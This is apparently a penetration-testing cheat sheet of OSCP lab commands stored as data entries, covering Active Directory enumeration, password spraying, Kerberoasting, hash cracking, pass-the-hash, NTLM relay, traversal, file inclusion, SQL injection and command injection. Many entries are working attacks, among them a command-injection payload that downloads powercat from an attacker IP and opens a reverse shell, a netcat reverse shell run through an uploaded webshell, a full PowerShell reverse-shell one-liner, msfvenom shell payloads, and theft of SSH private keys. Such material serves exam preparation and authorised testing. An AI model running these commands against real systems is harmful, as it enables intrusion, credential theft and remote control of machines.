Get-NetUser + lang: ps1 + tags: oscp powershell windows PowerView + desc: get a list of all users in the domain + - cmd: Get-NetUser | select cn,pwdlastset,lastlogon + lang: ps1 + tags: oscp powershell windows PowerView + desc: get a list of all users in the domain and pipe output to select only attributes + - cmd: Get-NetGroup | select cn + lang: ps1 + tags: oscp powershell windows PowerView + desc: enumerate groups and pipe output to select only attributes + - cmd: Get-NetGroup "Sales Department" | select member + lang: ps1 + tags: oscp powershell windows PowerView + desc: investigate the Sales Department using Get-NetGroup and pipe the output into select member + - cmd: Get-NetComputer + lang: ps1 + tags: oscp powershell windows PowerView + desc: enumerate the computer objects in the domain + - cmd: Get-NetComputer | select operatingsystem,dnshostname + lang: ps1 + tags: oscp powershell windows PowerView + desc: enumerate the computer objects in the domain and list operating system and hostnames + - cmd: Get-NetComputer | select dnshostname,operatingsystem,operatingsystemversion + lang: ps1 + tags: oscp powershell windows PowerView + desc: enumerate the computer objects with OS version + - cmd: Find-LocalAdminAccess + lang: ps1 + tags: oscp powershell windows PowerView + desc: Scanning domain to find local administrative privileges for our user + - cmd: Get-NetSession -ComputerName files04 -Verbose + lang: ps1 + tags: oscp powershell windows PowerView + desc: Checking logged on users + - cmd: Get-Acl -Path HKLM:SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity\ | fl + lang: ps1 + tags: oscp powershell windows + desc: Displaying permissions on the DefaultSecurity registry hive + - cmd: .\PsLoggedon.exe \\files04 + lang: ps1 + tags: oscp powershell windows + desc: PsLoggedOn to see user logons at Files04 + - cmd: setspn -L iis_service + lang: ps1 + tags: oscp powershell windows + desc: Listing SPN linked to a certain user account + - cmd: Get-NetUser -SPN | select samaccountname,serviceprincipalname + lang: ps1 + tags: oscp powershell windows + desc: Listing the SPN accounts in the domain + - cmd: nslookup.exe web04.corp.com + lang: ps1 + tags: oscp powershell windows + desc: Resolving the web04.corp.com name + - cmd: Get-ObjectAcl -Identity stephanie + lang: ps1 + tags: oscp powershell windows PowerView + desc: Running Get-ObjectAcl specifying our user + - cmd: Convert-SidToName S-1-5-21-1987370270-658905905-1781884369-1104 + lang: ps1 + tags: oscp powershell windows PowerView + desc: Converting the ObjectISD into name + - cmd: 'Get-ObjectAcl -Identity "Management Department" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights' + lang: ps1 + tags: oscp powershell windows PowerView + desc: Enumerating ACLs for the Management Group + - cmd: '"S-1-5-21-1987370270-658905905-1781884369-512","S-1-5-21-1987370270-658905905-1781884369-1104" | Convert-SidToName' + lang: ps1 + tags: oscp powershell windows PowerView + desc: Converting all SIDs that have GenericAll permission on the Management Group + - cmd: net group "Management Department" stephanie /add /domain + lang: ps1 + tags: oscp powershell windows + desc: Using "net.exe" to add ourselves to domain group + - cmd: Get-NetGroup "Management Department" | select member + lang: ps1 + tags: oscp powershell windows PowerView + desc: Running "Get-NetGroup" to enumerate "Management Department" + - cmd: net group "Management Department" stephanie /del /domain + lang: ps1 + tags: oscp powershell windows + desc: Using "net.exe" to remove ourselves from domain group + - cmd: Find-DomainShare + lang: ps1 + tags: oscp powershell windows PowerView + desc: Domain Share Query + - cmd: ls \\dc1.corp.com\sysvol\corp.com\ + lang: ps1 + tags: oscp powershell windows + desc: Listing contents of the SYSVOL share + - cmd: ls \\dc1.corp.com\sysvol\corp.com\Policies\ + lang: ps1 + tags: oscp powershell windows PowerView + desc: Listing contents of the "SYSVOL\policies share" + - cmd: gpp-decrypt "+bsY0V3d4/KgX3VJdO/vyepPfAN1zMFTiQDApgR92JE" + lang: ps1 + tags: oscp powershell windows PowerView + desc: Using gpp-decrypt to decrypt the password GPP Group Policy Preferences + - cmd: Get-Help Invoke-BloodHound + lang: ps1 + tags: oscp powershell windows BloodHound + desc: Checking the SharpHound options + - cmd: Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Users\stephanie\Desktop\ -OutputPrefix "corp audit" -prettyprint + lang: ps1 + tags: oscp powershell windows PowerView + desc: Running SharpHound to collect domain data + - cmd: sudo neo4j start + lang: sh + tags: oscp + desc: Starting the Neo4j service in Kali Linux + - cmd: bloodhound + lang: ps1 + tags: oscp sh + desc: Starting BloodHound in Kali Linux + - cmd: Find-InterestingDomainAcl -ResolveGUIDs + lang: ps1 + tags: oscp powershell windows PowerView + desc: Search for interesting ACEs + - cmd: Get-DomaiObjectAcl -Identity -ResolveGUIDs + lang: ps1 + tags: oscp powershell windows PowerView + desc: Returns the ACLs associated with the specified account + - cmd: Get-PathAcl -Path \\Path\Of\A\Share + lang: ps1 + tags: oscp powershell windows PowerView + desc: Check the ACLs associated with a specified path (e.g smb share) + - cmd: Invoke-UserHunter -CheckAccess + lang: ps1 + tags: oscp powershell windows PowerView + desc: Get members from Domain Admins (default) and a list of computers and check if any of the users is logged + - cmd: .\Spray-Passwords.ps1 -Pass Nexus123! -Admin + lang: ps1 + tags: oscp powershell windows PowerView + desc: Using Spray-Passwords to attack user accounts + - cmd: crackmapexec smb 192.168.50.75 -u users.txt -p 'Nexus123!' -d corp.com --continue-on-success + lang: sh + tags: oscp + desc: Using crackmapexec to attack user accounts + - cmd: crackmapexec smb 192.168.56.30 --users + lang: sh + tags: oscp + desc: Using crackmapexec to enumerates user on DC + - cmd: crackmapexec smb 192.168.50.75 -u dave -p 'Flowers1' -d corp.com + lang: sh + tags: oscp + desc: Crackmapexec output indicating that the valid credentials have administrative privileges on the target + - cmd: crackmapexec winrm 10.10.77.148 -u users -H ntml_hashs --continue-on-success + lang: sh + tags: oscp + desc: Crackmapexec bruteforce winrm using ntmlm hash + - cmd: .\kerbrute_windows_amd64.exe passwordspray -d corp.com .\usernames.txt "Nexus123!" + lang: ps1 + tags: oscp + desc: Using kerbrute to attack user accounts + - cmd: for i in 70 74 76 75 72 73; do crackmapexec smb 192.168.247.$i -u pete -p 'Nexus123!' -d corp.com;echo; done + lang: sh + tags: oscp + desc: Spray the credentials of pete against all domain joined machines with crackmapexec + - cmd: impacket-GetNPUsers -dc-ip 192.168.247.70 -request -outputfile hashes.asreproast corp.com/pete + lang: sh + tags: oscp + desc: Using GetNPUsers to perform AS-REP roasting + - cmd: impacket-GetNPUsers -dc-ip 192.168.56.30 -no-pass -usersfile users.txt minilab/ + lang: sh + tags: oscp + desc: try asreproasting on all the users + - cmd: sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force + lang: sh + tags: oscp + desc: Cracking the AS-REP hash with Hashcat + - cmd: .\Rubeus.exe asreproast /nowrap + lang: ps1 + tags: oscp powershell windows + desc: Using Rubeus to obtain the AS-REP hash of dave + - cmd: .\Rubeus.exe kerberoast /outfile:hashes.kerberoast + lang: ps1 + tags: oscp + desc: Utilizing Rubeus to perform a Kerberoast attack (TGS-REP) + - cmd: sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force + lang: sh + tags: oscp + desc: Cracking the TGS-REP hash + - cmd: sudo impacket-GetUserSPNs -request -dc-ip 192.168.50.70 corp.com/pete + lang: sh + tags: oscp + desc: Using impacket-GetUserSPNs to perform Kerberoasting on Linux (TGS-REP) + - cmd: impacket-GetUserSPNs -request -dc-ip 192.168.56.30 mini.lab/carol:123456789 + lang: sh + tags: oscp + desc: Using impacket-GetUserSPNs to perform Kerberoasting on Linux (TGS-REP) + - cmd: sudo hashcat -m XXX ./hashs.file /usr/share/wordlists/rockyou.txt -j '$1' --force + lang: sh + tags: oscp + desc: crack using rockyou and use a custom rule (here append 1 to password to match like secret1) + - cmd: whois megacorpone.com -h 192.168.50.251 + lang: sh + tags: oscp + desc: Using whois on megacorpone.com + - cmd: whois 38.100.193.70 -h 192.168.50.251 + lang: sh + tags: oscp + desc: Whois reverse lookup + - cmd: host www.megacorpone.com + lang: sh + tags: oscp + desc: Using host to find the A host record for + - cmd: host -t mx megacorpone.com + lang: sh + tags: oscp + desc: Using host to find the MX records for + - cmd: host -t txt megacorpone.com + lang: sh + tags: oscp + desc: Using host to find the TXT records for + - cmd: host idontexist.megacorpone.com + lang: sh + tags: oscp + desc: Using host to search for an invalid host + - cmd: for ip in $(cat list.txt); do host $ip.megacorpone.com; done + lang: sh + tags: oscp + desc: Using Bash to brute force forward DNS + - cmd: for ip in $(seq 200 254); do host 51.222.169.$ip; done | grep -v "not found" + lang: sh + tags: oscp + desc: Using Bash to brute force reverse DNS + - cmd: dnsrecon -d megacorpone.com -t std + lang: sh + tags: oscp + desc: Using dnsrecon to perform a standard + - cmd: dnsrecon -d megacorpone.com -D ~/list.txt -t brt + lang: sh + tags: oscp + desc: Brute forcing hostnames using dnsrecon + - cmd: dnsenum megacorpone.com + lang: sh + tags: oscp + desc: Using dnsenum to automate DNS enumeration + - cmd: nslookup mail.megacorptwo.com + lang: sh + tags: oscp + desc: Using nslookup to perform a simple host enumeration + - cmd: nslookup -type=TXT info.megacorptwo.com 192.168.50.151 + lang: sh + tags: oscp + desc: Using nslookup to perform a more specific query + - cmd: nc -nvv -w 1 -z 192.168.50.152 3388-3390 + lang: sh + tags: oscp + desc: Using netcat to perform a TCP port scan + - cmd: nc -nv -u -z -w 1 192.168.50.149 120-123 + lang: sh + tags: oscp + desc: Using Netcat to perform a UDP port scan + - cmd: Test-NetConnection -Port 445 192.168.50.151 + lang: ps1 + tags: oscp + desc: Port scanning SMB via PowerShell + - cmd: 1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("192.168.50.151", $_)) "TCP port $_ is open"} 2>$null + lang: ps1 + tags: oscp + desc: Automating the PowerShell portscanning + - cmd: sudo nbtscan -r 192.168.50.0/24 + lang: sh + tags: oscp + desc: Using nbtscan to collect additional NetBIOS + - cmd: net view \\dc01 /all + lang: ps1 + tags: oscp + desc: Running 'net view' to list remote shares + - cmd: Test-NetConnection -Port 25 192.168.50.8 + lang: ps1 + tags: oscp + desc: Port scanning SMB via PowerShell + - cmd: dism /online /Enable-Feature /FeatureName:TelnetClient + lang: ps1 + tags: oscp + desc: Installing the Telnet client + - cmd: telnet 192.168.50.8 25 + lang: ps1 + tags: oscp + desc: Interacting with the SMTP service via Telnet on Windows + - cmd: for ip in $(seq 1 254); do echo 192.168.50.$ip; done > ips ; onesixtyone -c community -i ips + lang: sh + tags: oscp + desc: Using onesixtyone to brute force + - cmd: snmpwalk -c public -v1 -t 10 192.168.50.151 + lang: sh + tags: oscp + desc: Using snmpwalk to enumerate the entire MIB + - cmd: snmpwalk -c public -v1 192.168.50.151 1.3.6.1.4.1.77.1.2.25 + lang: sh + tags: oscp + desc: Using snmpwalk to enumerate Windows users + - cmd: snmpwalk -c public -v1 192.168.50.151 1.3.6.1.2.1.25.4.2.1.2 + lang: sh + tags: oscp + desc: Using snmpwalk to enumerate Windows + - cmd: snmpwalk -c public -v1 192.168.50.151 1.3.6.1.2.1.25.6.3.1.2 + lang: sh + tags: oscp + desc: Using snmpwalk to enumerate + - cmd: snmpwalk -c public -v1 192.168.50.151 1.3.6.1.2.1.6.13.1.3 + lang: sh + tags: oscp + desc: Using snmpwalk to enumerate open TCP ports + - cmd: gobuster dir -u 192.168.50.20 -w /usr/share/wordlists/dirb/common.txt -t 5 + lang: sh + tags: oscp + desc: Running Gobuster + - cmd: cat /etc/hosts + lang: sh + tags: oscp + desc: Setting up our /etc/hosts file for offsecwp + - cmd: cat /usr/share/wordlists/rockyou.txt | head + lang: sh + tags: oscp + desc: Copying the first 10 rockyou wordlist values + - cmd: curl https://www.google.com/robots.txt + lang: sh + tags: oscp + desc: https://www.google.com/robots.txt + - cmd: gobuster dir -u http://192.168.50.16:5002 -w /usr/share/wordlists/dirb/big.txt -p pattern + lang: sh + tags: oscp + desc: Bruteforcing API Paths + - cmd: curl -i http://192.168.50.16:5002/users/v1 + lang: sh + tags: oscp + desc: Obtaining Users' Information + - cmd: gobuster dir -u http://192.168.50.16:5002/users/v1/admin/ -w /usr/share/wordlists/dirb/small.txt + lang: sh + tags: oscp + desc: Discovering extra APIs + - cmd: curl -i http://192.168.50.16:5002/users/v1/admin/password + lang: sh + tags: oscp + desc: Discovering API unsupported methods + - cmd: curl -i http://192.168.50.16:5002/users/v1/login + lang: sh + tags: oscp + desc: Inspecting the login API + - cmd: curl -i http://offsecwp --user-agent "" --proxy 127.0.0.1:8080 + lang: sh + tags: oscp + desc: Launching the Final XSS Attack through Curl + - cmd: pwd ; ls / ; cat /etc/passwd + lang: sh + tags: oscp + desc: Display content of /etc/passwd with an absolute path + - cmd: curl http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../home/offsec/.ssh/id_rsa + lang: sh + tags: oscp + desc: SSH Private Key via curl + - cmd: ssh -i dt_key -p 2222 offsec@mountaindesserts.com ; yes ; chmod 400 dt_key ; ssh -i dt_key -p 2222 offsec@mountaindesserts.com + lang: sh + tags: oscp + desc: Using the Private Key to connect via SSH + - cmd: curl http://192.168.50.16/cgi-bin/../../../../etc/passwd ; curl http://192.168.50.16/cgi-bin/../../../../../../../../../../etc/passwd + lang: sh + tags: oscp + desc: Using "../" to leverage the Directory Traversal vulnerability in Apache 2.4.49 + - cmd: curl http://192.168.50.16/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd + lang: sh + tags: oscp + desc: Using encoded dots for Directory Traversal + - cmd: curl http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../var/log/apache2/access.log + lang: sh + tags: oscp + desc: Log entry of Apache's access.log + - cmd: curl http://mountaindesserts.com/meteor/index.php?page=admin.php + lang: sh + tags: oscp + desc: Contents of the admin.php file + - cmd: curl http://mountaindesserts.com/meteor/index.php?page=php://filter/resource=admin.php + lang: sh + tags: oscp + desc: Usage of "php://filter" to include unencoded admin.php + - cmd: curl http://mountaindesserts.com/meteor/index.php?page=php://filter/convert.base64-encode/resource=admin.php + lang: sh + tags: oscp + desc: Usage of "php://filter" to include base64 encoded admin.php + - cmd: echo "PCFET0NUWVBFIGh0bWw+CjxodG1sIGxhbmc9ImVuIj4KPGhlYWQ+CiAgICA8bWV0YSBjaGFyc2V0PSJVVEYtOCI+CiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEuMCI+CiAgICA8dGl0bGU+TWFpbnRlbmFuY2U8L3RpdGxlPgo8L2hlYWQ+Cjxib2R5PgogICAgICAgIDw/cGhwIGVjaG8gJzxzcGFuIHN0eWxlPSJjb2xvcjojRjAwO3RleHQtYWxpZ246Y2VudGVyOyI+VGhlIGFkbWluIHBhZ2UgaXMgY3VycmVudGx5IHVuZGVyIG1haW50ZW5hbmNlLic7ID8+Cgo8P3BocAokc2VydmVybmFtZSA9ICJsb2NhbGhvc3QiOwokdXNlcm5hbWUgPSAicm9vdCI7CiRwYXNzd29yZCA9ICJNMDBuSzRrZUNhcmQhMiMiOwoKLy8gQ3JlYXRlIGNvbm5lY3Rpb24KJGNvbm4gPSBuZXcgbXlzcWxpKCRzZXJ2ZXJuYW1lLCAkdXNlcm5hbWUsICRwYXNzd29yZCk7CgovLyBDaGVjayBjb25uZWN0aW9uCmlmICgkY29ubi0+Y29ubmVjdF9lcnJvcikgewogIGRpZSgiQ29ubmVjdGlvbiBmYWlsZWQ6ICIgLiAkY29ubi0+Y29ubmVjdF9lcnJvcik7Cn0KZWNobyAiQ29ubmVjdGVkIHN1Y2Nlc3NmdWxseSI7Cj8+Cgo8L2JvZHk+CjwvaHRtbD4K" | base64 -d + lang: sh + tags: oscp + desc: Decoding the base64 encoded content of admin.php + - cmd: curl "http://mountaindesserts.com/meteor/index.php?page=data://text/plain," + lang: sh + tags: oscp + desc: Usage of the "data://" wrapper to execute ls + - cmd: echo -n '' | base64 ; curl "http://mountaindesserts.com/meteor/index.php?page=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==&cmd=ls" + lang: sh + tags: oscp + desc: Usage of the "data://" wrapper with base64 encoded data + - cmd: curl "http://mountaindesserts.com/meteor/index.php?page=http://192.168.119.3/simple-backdoor.php&cmd=ls" + lang: sh + tags: oscp + desc: Exploiting RFI with a PHP backdoor and execution of ls + - cmd: curl http://192.168.50.189/meteor/uploads/simple-backdoor.pHP?cmd=dir + lang: sh + tags: oscp + desc: Execution of dir command in the uploaded webshell + - cmd: pwsh ; $Text = '$client = New-Object System.Net.Sockets.TCPClient("192.168.119.3",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' ; $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text) ; $EncodedText =[Convert]::ToBase64String($Bytes) ; $EncodedText ; exit + lang: ps1 + tags: oscp + desc: Encoding the oneliner in PowerShell on Linux + - cmd: ls -la /usr/share/webshells + lang: sh + tags: oscp + desc: Listing of the webshells directory on Kali + - cmd: curl http://mountaindesserts.com:8000/index.php ; curl http://mountaindesserts.com:8000/meteor/index.php ; curl http://mountaindesserts.com:8000/admin.php + lang: sh + tags: oscp + desc: Failed attempts to access PHP files + - cmd: ssh-keygen ; fileup ; cat fileup.pub > authorized_keys + lang: sh + tags: oscp + desc: Prepare authorized_keys file for File Upload + - cmd: ssh -o PubkeyAcceptedAlgorithms=ssh-rsa -o HostKeyAlgorithms=ssh-rsa user@192.168.195.245 + lang: sh + tags: oscp + desc: connect on old SSH server + - cmd: rm ~/.ssh/known_hosts ; ssh -p 2222 -i fileup root@mountaindesserts.com ; yes + lang: sh + tags: oscp + desc: Using the SSH key to successufully connect via SSH as the root user + - cmd: curl -X POST --data 'Archive=ipconfig' http://192.168.50.189:8000/archive + lang: sh + tags: oscp + desc: Detected Command Injection for ipconfig + - cmd: curl -X POST --data 'Archive=git' http://192.168.50.189:8000/archive + lang: sh + tags: oscp + desc: Entering git as command + - cmd: curl -X POST --data 'Archive=git version' http://192.168.50.189:8000/archive + lang: sh + tags: oscp + desc: Using git version to detect the operating system + - cmd: curl -X POST --data 'Archive=git%3Bipconfig' http://192.168.50.189:8000/archive + lang: sh + tags: oscp + desc: Entering git and ipconfig with encoded semicolon + - cmd: curl -X POST --data 'Archive=git%3B(dir%202%3E%261%20*%60%7Cecho%20CMD)%3B%26%3C%23%20rem%20%23%3Eecho%20PowerShell' http://192.168.50.189:8000/archive + lang: sh + tags: oscp + desc: Determining where the injected commands are executed + - cmd: curl -X POST --data 'Archive=git%3BIEX%20(New-Object%20System.Net.Webclient).DownloadString(%22http%3A%2F%2F192.168.119.3%2Fpowercat.ps1%22)%3Bpowercat%20-c%20192.168.119.3%20-p%204444%20-e%20powershell' http://192.168.50.189:8000/archive + lang: sh + tags: oscp + desc: Downloading Powercat and creating a reverse shell via Command Injection + - cmd: mysql -u root -p'root' -h 192.168.50.16 -P 3306 + lang: sh + tags: oscp + desc: Connecting to the remote MySQL instance + - cmd: impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-auth + lang: sh + tags: oscp + desc: Connecting to the Remote MSSQL instance via Impacket + - cmd: impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-auth ; EXECUTE sp_configure 'show advanced options', 1; ; RECONFIGURE; ; EXECUTE sp_configure 'xp_cmdshell', 1; ; RECONFIGURE; + lang: sh + tags: oscp + desc: Enabling xp_cmdshell feature + - cmd: sqlmap -u http://192.168.50.19/blindsqli.php?user=1 -p user + lang: sh + tags: oscp + desc: Running sqlmap to quickly find SQL injection points + - cmd: sqlmap -u http://192.168.50.19/blindsqli.php?user=1 -p user --dump + lang: sh + tags: oscp + desc: Running sqlmap to Dump Users Credentials Table + - cmd: sqlmap -r post.txt -p item --os-shell --web-root "/var/www/html/tmp" + lang: sh + tags: oscp + desc: Running sqlmap with osshell + - cmd: pip3 install wsgidav + lang: sh + tags: oscp + desc: Installing pip3 and WsgiDAV + - cmd: wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/webdav/ + lang: sh + tags: oscp + desc: Starting WsgiDAV on port 80 + - cmd: firefox --search "Microsoft Edge site:exploit-db.com" + lang: sh + tags: oscp + desc: Using Google to search for + - cmd: sudo apt update && sudo apt install exploitdb + lang: sh + tags: oscp + desc: Updating the exploitdb package from the + - cmd: ls -1 /usr/share/exploitdb/ + lang: sh + tags: oscp + desc: Listing the two major sections in the archive + - cmd: ls -1 /usr/share/exploitdb/exploits + lang: sh + tags: oscp + desc: Listing the content of the exploits + - cmd: searchsploit + lang: sh + tags: oscp + desc: The searchsploit command syntax + - cmd: searchsploit remote smb microsoft windows + lang: sh + tags: oscp + desc: Using searchsploit to list available + - cmd: searchsploit -m windows/remote/48537.py ; searchsploit -m 42031 + lang: sh + tags: oscp + desc: The exploits are copied the + - cmd: searchsploit -m 50944 + lang: sh + tags: oscp + desc: The exploit is copied into our current working directory + - cmd: python3 50944.py -url http://192.168.50.11/project/ -u george@AIDevCorp.org -p AIDevCorp + lang: sh + tags: oscp + desc: The exploit completed successfully with an uploaded file + - cmd: curl http://192.168.50.11/project/uploads/users/420919-backdoor.php?cmd=whoami + lang: sh + tags: oscp + desc: The PHP script was executed by the wwwdata system account + - cmd: curl http://192.168.50.11/project/uploads/users/420919-backdoor.php --data-urlencode "cmd=which nc" + lang: sh + tags: oscp + desc: nc is installed on the target + - cmd: curl http://192.168.50.11/project/uploads/users/420919-backdoor.php --data-urlencode "cmd=nc -nv 192.168.50.129 6666 -e /bin/bash" + lang: sh + tags: oscp + desc: The reverse netcat shell is executed and the terminal session does not respond + - cmd: searchsploit "Sync Breeze Enterprise 10.0.28" + lang: sh + tags: oscp + desc: Searching for available + - cmd: searchsploit -m 42341 + lang: sh + tags: oscp + desc: Using searchsploit to copy + - cmd: sudo apt install mingw-w64 + lang: sh + tags: oscp + desc: Installing the mingww64 crosscompiler in Kali + - cmd: i686-w64-mingw32-gcc 42341.c -o syncbreeze_exploit.exe + lang: sh + tags: oscp + desc: Errors displayed after attempting + - cmd: msfvenom -p windows/shell_reverse_tcp LHOST=192.168.50.4 LPORT=443 EXITFUNC=thread -f c –e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26\x2b\x3d" + lang: sh + tags: oscp + desc: Using msfvenom to generate a + - cmd: sudo wine syncbreeze_exploit.exe + lang: sh + tags: oscp + desc: Running the Windows exploit using + - cmd: i686-w64-mingw32-gcc 42341.c -o syncbreeze_exploit.exe -lws2_32 + lang: sh + tags: oscp + desc: Compiling the exploit and setting up + - cmd: wine syncbreeze_exploit.exe + lang: sh + tags: oscp + desc: Running the final version of the + - cmd: curl -k https://192.168.50.45/uploads/shell.php?cmd=whoami + lang: sh + tags: oscp + desc: Verifying if our exploit was + - cmd: xxd -b malware.txt + lang: sh + tags: oscp + desc: Inspecting the binary file content with xxd + - cmd: msfvenom -p windows/shell_reverse_tcp LHOST=192.168.50.1 LPORT=443 -f exe > binary.exe + lang: sh + tags: oscp + desc: Generating a malicious PE + - cmd: msfvenom -p windows/shell_reverse_tcp LHOST=192.168.50.1 LPORT=443 -f powershell -v sc + lang: sh + tags: oscp + desc: Generating a PowerShell compatible + - cmd: .\bypass.ps1 + lang: ps1 + tags: oscp + desc: Attempting to run the script + - cmd: Get-ExecutionPolicy -Scope CurrentUser ; Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUser ; A ; Get-ExecutionPolicy -Scope CurrentUser + lang: ps1 + tags: oscp + desc: Changing the ExecutionPolicy for our + - cmd: apt-cache search shellter ; sudo apt install shellter + lang: sh + tags: oscp + desc: Installing shellter in Kali Linux + - cmd: sudo apt install wine + lang: sh + tags: oscp + desc: Installing wine in Kali Linux + - cmd: msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST 192.168.50.1;set LPORT 443;run;" + lang: sh + tags: oscp + desc: Setting up a handler for the meterpreter payload + - cmd: cd /usr/share/wordlists/ ; ls ; sudo gzip -d rockyou.txt.gz ; hydra -l george -P /usr/share/wordlists/rockyou.txt -s 2222 ssh://192.168.50.201 + lang: sh + tags: oscp + desc: Unzipping Gzip Archive and attacking SSH + - cmd: hydra -L /usr/share/wordlists/dirb/others/names.txt -p "SuperS3cure1337#" rdp://192.168.50.202 + lang: sh + tags: oscp + desc: Spraying a password on RDP service + - cmd: hydra -l user -P /usr/share/wordlists/rockyou.txt 192.168.50.201 http-post-form "/index.php:fm_usr=user&fm_pwd=^PASS^:Login failed. Invalid" + lang: sh + tags: oscp + desc: Successful Dictionary Attack on the Login Form + - cmd: echo -n "secret" | sha256sum ; echo -n "secret" | sha256sum ; echo -n "secret1" | sha256sum + lang: sh + tags: oscp + desc: Comparing resulting hash values for secret and secret1 + - cmd: echo -n "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" | wc -c ; python3 -c "print(62**5)" + lang: sh + tags: oscp + desc: Calculating the keyspace for a password of length 5 + - cmd: hashcat -b + lang: sh + tags: oscp + desc: Benchmark CPU with MD5, SHA1, and SHA2256 + - cmd: python3 -c "print(916132832 / 134200000)" ; python3 -c "print(916132832 / 9276300000)" + lang: sh + tags: oscp + desc: Calculating the cracking time for password length of 5 + - cmd: hashcat -m 0 crackme.txt /usr/share/wordlists/rockyou.txt -r demo3.rule --force + lang: sh + tags: oscp + desc: Cracking a MD5 Hash with Hashcat and a mutated rockyou.txt wordlist + - cmd: ls -la /usr/share/hashcat/rules/ + lang: sh + tags: oscp + desc: Listing of Hashcat's rule files + - cmd: ls -la Database.kdbx ; keepass2john Database.kdbx > keepass.hash ; cat keepass.hash + lang: sh + tags: oscp + desc: Using keepass2john to format the KeePass database for Hashcat + - cmd: cat keepass.hash + lang: sh + tags: oscp + desc: Correct hash format for Hashcat without "Database:" + - cmd: hashcat --help | grep -i "KeePass" + lang: sh + tags: oscp + desc: Finding the mode of KeePass in Hashcat + - cmd: hashcat -m 13400 keepass.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule --force + lang: sh + tags: oscp + desc: Cracking the KeePass database hash + - cmd: chmod 600 id_rsa ; ssh -i id_rsa -p 2222 dave@192.168.50.201 ; yes ; ssh -i id_rsa -p 2222 dave@192.168.50.201 + lang: sh + tags: oscp + desc: SSH connection attempts with the private key + - cmd: ssh2john id_rsa > ssh.hash ; cat ssh.hash + lang: sh + tags: oscp + desc: Using ssh2john to format the hash + - cmd: hashcat -h | grep -i "ssh" + lang: sh + tags: oscp + desc: Determine the correct mode for Hashcat + - cmd: hashcat -m 22921 ssh.hash ssh.passwords -r ssh.rule --force + lang: sh + tags: oscp + desc: Failed cracking attempt with Hashcat + - cmd: cat ssh.rule ; sudo sh -c 'cat /home/kali/passwordattacks/ssh.rule >> /etc/john/john.conf' + lang: sh + tags: oscp + desc: Adding the named rules to the JtR configuration file + - cmd: john --wordlist=ssh.passwords --rules=sshRules ssh.hash + lang: sh + tags: oscp + desc: Cracking the hash with JtR + - cmd: ssh -i id_rsa -p 2222 dave@192.168.50.201 + lang: sh + tags: oscp + desc: Entering Passphrase to connect to the target system with SSH + - cmd: Get-LocalUser + lang: ps1 + tags: oscp + desc: Showing all local users in PowerShell + - cmd: hashcat --help | grep -i "ntlm" + lang: sh + tags: oscp + desc: Hashcat mode for NTLM hashes + - cmd: hashcat -m 1000 nelly.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force + lang: sh + tags: oscp + desc: NTLM hash of user nelly in nelly.hash and Hashcat mode + - cmd: impacket-psexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@192.168.50.212 + lang: sh + tags: oscp + desc: NTLM hash of user nelly in nelly.hash and Hashcat mode + - cmd: impacket-psexec relia.com/maildmz:DPuBT9tGCBrTbR@192.168.244.189 + lang: sh + tags: oscp + desc: Using psexec to get an interactive shell + - cmd: impacket-wmiexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@192.168.50.212 + lang: sh + tags: oscp + desc: Using wmiexec to get an interactive shell + - cmd: ip a ; sudo responder -I tap0 + lang: ps1 + tags: oscp + desc: Starting Responder on interface tap0 + - cmd: dir \\192.168.119.2\test + lang: ps1 + tags: oscp + desc: Using the dir command to create an SMB connection to our Kali machine + - cmd: cat paul.hash ; hashcat --help | grep -i "ntlm" + lang: sh + tags: oscp + desc: Contents of paul.hash and Hashcat mode + - cmd: hashcat -m 5600 paul.hash /usr/share/wordlists/rockyou.txt --force + lang: sh + tags: oscp + desc: Cracking the NetNTLMv2 hash of paul + - cmd: sudo impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.50.212 -c "powershell -enc JABjAGwAaQBlAG4AdA..." + lang: sh + tags: oscp + desc: Starting ntlmrelayx for a Relayattack targeting FILES02 + - cmd: dir \\192.168.119.2\test + lang: sh + tags: oscp + desc: Using the dir command to create an SMB connection to our Kali machine + - cmd: powershell ; Get-LocalUser + lang: ps1 + tags: oscp + desc: Display local users on CLIENT220 + - cmd: Get-LocalGroup + lang: ps1 + tags: oscp + desc: Display local groups on CLIENTWK220 + - cmd: Get-LocalGroupMember adminteam ; Get-LocalGroupMember Administrators + lang: ps1 + tags: oscp + desc: Display members of the group adminteam + - cmd: systeminfo + lang: ps1 + tags: oscp + desc: Information about the operating system and architecture + - cmd: ipconfig /all + lang: ps1 + tags: oscp + desc: 